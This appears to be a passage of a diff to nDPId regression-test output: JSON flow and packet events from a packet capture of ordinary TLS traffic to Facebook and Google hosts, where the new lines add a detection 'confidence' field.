+00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3513,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715133,"flow_last_seen":1605289715287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605289715287,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3659,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1605289715301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289715301,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoDKIDwMAAT+s6wDAAAAAMqAcsBIEmLB5kd7IUo3\/YpAbvIXBJtCi5yubyHoBJXgCqsAAACBAV4AQMDAwQCCArCuSZZuEzcCg=="}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3662,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1605289715301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289715301,"pkt":"qtsDr8lk5EKm5WPyht1gCiKuACAGQCoBywEgSYsHmR3shSjf9ikqAyiA8DAAE\/rOsAwAAAADyFwBu3K5vIcSbQovgBAB+66iAAABAQgKuEzcJcK5Jlk="}
-00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3667,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715274,"flow_last_seen":1605289715301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289715301,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3797,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715221,"flow_last_seen":1605289715321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605289715321,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00978{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3820,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715274,"flow_last_seen":1605289715333,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"ts_msec":1605289715333,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3667,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715274,"flow_last_seen":1605289715301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289715301,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3797,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715221,"flow_last_seen":1605289715321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605289715321,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01004{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3820,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715274,"flow_last_seen":1605289715333,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"ts_msec":1605289715333,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"connect.facebook.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00621{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6497,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715782,"flow_last_seen":1605289715782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605289715782,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6497,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1605289715782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289715782,"pkt":"qtsDr8lk5EKm5WPyht1gAWIEACgGQCoBywEgSYsHmR3shSjf9ikqAyiA8R8Ag\/rOsAwAACXe67QBu2RbtWoAAAAAoAL9IBbyAAACBAWgBAIICmcfa8wAAAAAAQMDBw=="}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6878,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605289715833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289715833,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoDKIDxHwCD+s6wDAAAJd4qAcsBIEmLB5kd7IUo3\/YpAbvrtAAp+EJkW7VroBJXgNkoAAACBAV4AQMDAwQCCArCuShfZx9rzA=="}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6886,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605289715833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289715833,"pkt":"qtsDr8lk5EKm5WPyht1gAWIEACAGQCoBywEgSYsHmR3shSjf9ikqAyiA8R8Ag\/rOsAwAACXe67QBu2RbtWsAKfhDgBAB+10HAAABAQgKZx9r\/8K5KF8="}
-00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6914,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715782,"flow_last_seen":1605289715834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289715834,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6914,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715782,"flow_last_seen":1605289715834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289715834,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7909,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289715966,"flow_last_seen":1605289715966,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605289715966,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7909,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605289715966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289715966,"pkt":"qtsDr8lk5EKm5WPyht1gDvs7ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAKuq4Bu2\/h7B4AAAAAoAL9IFQFAAACBAWgBAIICqkvSd0AAAAAAQMDBw=="}
-00977{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8857,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715782,"flow_last_seen":1605289716018,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"ts_msec":1605289716018,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8857,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715782,"flow_last_seen":1605289716018,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":316,"midstream":0,"ts_msec":1605289716018,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.facebook.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8901,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605289716021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289716021,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbu6rg79HT9v4ewfoBJXgOHBAAACBAV4AQMDAwQCCArCuSkJqS9J3Q=="}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8902,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1605289716021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289716021,"pkt":"qtsDr8lk5EKm5WPyht1gDvs7ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAKuq4Bu2\/h7B8O\/R1AgBAB+2WcAAABAQgKqS9KFMK5KQk="}
-00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8903,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715966,"flow_last_seen":1605289716024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289716024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8994,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715966,"flow_last_seen":1605289716084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605289716084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8903,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289715966,"flow_last_seen":1605289716024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289716024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8994,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289715966,"flow_last_seen":1605289716084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605289716084,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"content-autofill.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9522,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289716168,"flow_last_seen":1605289716168,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"ts_msec":1605289716168,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9522,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1605289716168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":244,"pkt_l4_len":190,"ts_msec":1605289716168,"pkt":"qtsDr8lk5EKm5WPyht1gB32\/AL4GQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACADqioBu9lam\/a\/4e68gBgE1TyJAAABAQgKZPSVcMK4jAQXAwMAmbA2YtBqXOwsPZhf0xplQUhs5uebiQ6HrXX0rQcB3CzDNqt6KEFEtOrnLbiyKoAl0\/PfpLU5lSyfN4b6GWAPMuxRzKK1mYHeU6cm19ssJsGj28uoKpDNJuLbc68jHie5jcE8\/swMHjb\/rsshDlUuBkbS0PBg+fBq\/uDg8aBU7dQCoscpqfDhz7OaLw8PBcid6Woaoneonk0XRQ=="}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9523,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1605289716168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":209,"pkt_l4_len":155,"ts_msec":1605289716168,"pkt":"qtsDr8lk5EKm5WPyht1gB32\/AJsGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACADqioBu9lanJS\/4e68gBgE1YEBAAABAQgKZPSVcMK4jAQXAwMAT0+KQ56NjlMHGW+d6G5ddduewRHnDyQJNOhFGSBeS16m4KVAja7XHlyuQrxKoq24Sn8bLVvUYgiRl0ogV926yAF+\/eBnK0DefdFCPgWpP6kXAwMAIh\/Eke2gVwnwKuWIWa9HbFAoJdRk5f1TigycRztSwvhmbFo="}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9663,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1605289716192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289716192,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgFAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbuqKr\/h7rzZWpyUgBALf8h0AAABAQgKwrkp2GT0lXA="}
-00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9768,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605289716168,"flow_last_seen":1605289716199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":21339,"flow_avg_l4_payload_len":666,"midstream":1,"ts_msec":1605289716199,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9768,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605289716168,"flow_last_seen":1605289716199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":21339,"flow_avg_l4_payload_len":666,"midstream":1,"ts_msec":1605289716199,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00679{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9768,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605289716168,"flow_last_seen":1605289716199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":21339,"flow_avg_l4_payload_len":666,"midstream":1,"ts_msec":1605289716199,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00680{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9768,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605289716168,"flow_last_seen":1605289716199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":21339,"flow_avg_l4_payload_len":666,"midstream":1,"ts_msec":1605289716199,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
